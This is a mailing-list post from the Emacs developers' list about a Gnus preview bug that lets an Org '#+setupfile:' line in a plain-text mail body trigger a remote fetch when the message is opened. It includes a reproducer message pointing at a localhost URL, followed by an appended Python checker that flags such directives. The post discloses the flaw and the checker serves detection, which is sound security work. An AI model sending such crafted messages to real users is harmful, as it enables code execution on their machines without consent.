From: Max Nikulin
Newsgroups: gmane.emacs.devel
Subject: Re: Reproducers for recent Emacs security issues
Date: Tue, 16 Apr 2024 11:35:50 +0700
Message-ID: <46e44c5c-47e0-4bfd-b90d-ad8a3f82b33d@gmail.com>
References: <875xwk8w5w.fsf@melete.silentflame.com> <706e1218-7451-4221-830a-ae3db3bf842e@gmail.com> <87cyqrf01x.fsf@melete.silentflame.com> <87mspv6kf0.fsf@localhost> <87y19fdklq.fsf@melete.silentflame.com> <87wmoy6dkl.fsf@localhost> <87edb6328y.fsf@mid.deneb.enyo.de> <8734rmmcfg.fsf@ust.hk>
In-Reply-To: <8734rmmcfg.fsf@ust.hk>
To: emacs-devel@gnu.org
Cc: Sean Whitton

On 16/04/2024 06:30, Andrew Cohen wrote:
>>>>>> "FW" == Florian Weimer writes:
> FW> It's a feature. [...]
> I stand corrected---this still looks quite useful and seems to be
> working as intended.

I am not trying to dispute that attachment preview is a useful feature
and it is nice to have syntax highlighting. I still believe its
implementation is buggy and its behavior may confuse those who test
fixes for the recent security vulnerabilities.

Consider the following message:

---- 8< ----
To: A User
From: Attacker
Subject: Gnus inline attachment preview is buggy
Date: Mon, 15 Apr 2024 17:47:53 +0000
Message-ID: <123@example.org>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------si3r85hbIUHz9WH"

This is a multi-part message in MIME format.
--------------si3r85hbIUHz9WH
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* The *following* line should not affect attachment preview:
#+setupfile: http://localhost:8000/setup-1234567890.org
- =text/plain= body :: should not be fonified as an Org mode buffer.
--------------si3r85hbIUHz9WH
Content-Type: text/x-org; charset=UTF-8; name="test.org"
Content-Disposition: attachment; filename="test.org"

Nothing dangerous or suspicious here.
--------------si3r85hbIUHz9WH--
---- >8 ----

The message body should be presented as plain text; its content should
not affect the attachment and should not be interpreted as Org mode
markup. What I see in Emacs-28.2 is that the text/plain message body is
fontified as an Org mode buffer, and even "#+setupfile:" is interpreted
by Org mode code.

I do not mind that the attachment is invisible when I open the message.
What I really do not like is that some code is executed for invisible
content. The attachment should be rendered when the user opens it, not
when the message is opened.

In Emacs-28.2 a *folded* *attachment* may cause interpretation of
"#+setupfile:" in the text/plain *body* as Org markup and may lead to
execution of arbitrary code downloaded from a remote site immediately
when the user opens the message, without additional user actions.

From my point of view, the *risk* of an attack requiring opening an
attachment is significantly lower than that of one where it is enough to
just open the mail message. I admit that the *impact* measured using the
Common Vulnerability Scoring System (CVSS) v3.1 is the same. In both
cases a user action is required.
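The reproducer above, as an added example that is not part of the original mail, of Emacs or of Gnus: a small Python checker that walks the MIME parts of a message, records each part's declared content type and disposition, and flags any text part carrying a "#+setupfile:" directive that points at a URL. The sample message is the reproducer from the mail, reconstructed with the blank lines MIME requires between part headers and part bodies; the checking logic and the function names are assumptions of this example, written for a mail gateway or test harness rather than for Emacs itself.

```python
"""Constructed example: inspect a multipart mail for Org "#+setupfile:"
directives in parts that a reader should only ever treat as plain text.

Not Emacs/Gnus code; the helpers below are assumptions of this example.
"""
import re
from email import message_from_string, policy

# The reproducer from the mail above, reconstructed as a constructed sample
# (blank separator lines restored so that a MIME parser accepts it).
SAMPLE = """\
To: A User
From: Attacker
Subject: Gnus inline attachment preview is buggy
Date: Mon, 15 Apr 2024 17:47:53 +0000
Message-ID: <123@example.org>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------si3r85hbIUHz9WH"

This is a multi-part message in MIME format.
--------------si3r85hbIUHz9WH
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* The *following* line should not affect attachment preview:
#+setupfile: http://localhost:8000/setup-1234567890.org
- =text/plain= body :: should not be fonified as an Org mode buffer.
--------------si3r85hbIUHz9WH
Content-Type: text/x-org; charset=UTF-8; name="test.org"
Content-Disposition: attachment; filename="test.org"

Nothing dangerous or suspicious here.
--------------si3r85hbIUHz9WH--
"""

# Org keyword that makes Org load another file; the mail shows it being
# honoured inside a text/plain body.  Case-insensitive, one per line.
ORG_SETUPFILE = re.compile(r"^\s*#\+setupfile:\s*(\S+)", re.IGNORECASE | re.MULTILINE)
# Targets that would be fetched over the network rather than read locally.
URL_SCHEME = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def leaf_parts(raw):
    """Yield (content_type, disposition, decoded_text_or_None) per leaf part."""
    msg = message_from_string(raw, policy=policy.default)
    for part in msg.walk():
        if part.is_multipart():
            continue  # containers carry no body of their own
        ctype = part.get_content_type()
        disp = part.get_content_disposition()  # None, "inline" or "attachment"
        # Only text parts are decoded; binary payloads are left alone.
        text = part.get_content() if part.get_content_maintype() == "text" else None
        yield ctype, disp, text


def part_summary(raw):
    """Declared type and disposition of every leaf part, in order."""
    return [(ctype, disp) for ctype, disp, _ in leaf_parts(raw)]


def find_setupfile_directives(raw):
    """Report every "#+setupfile:" line found in any text part.

    A hit in a text/plain part is the case the mail describes: a reader that
    fontifies the whole message as Org would act on it although the part was
    never declared as Org content.
    """
    findings = []
    for ctype, disp, text in leaf_parts(raw):
        if text is None:
            continue
        for match in ORG_SETUPFILE.finditer(text):
            target = match.group(1)
            findings.append({
                "content_type": ctype,
                "disposition": disp,
                "target": target,
                "fetches_url": bool(URL_SCHEME.match(target)),
                # Declared plain text must never be interpreted as Org markup.
                "in_plain_text_part": ctype == "text/plain",
            })
    return findings


if __name__ == "__main__":
    for entry in part_summary(SAMPLE):
        print("part:", entry)
    for hit in find_setupfile_directives(SAMPLE):
        print("setupfile directive:", hit)
```

Run on the sample, the summary shows the two parts the mail describes, a text/plain body with no disposition and a text/x-org attachment, and the only "#+setupfile:" hit sits in the text/plain part and points at an http:// URL, which is exactly the combination the mail argues a reader must not act on at message-open time.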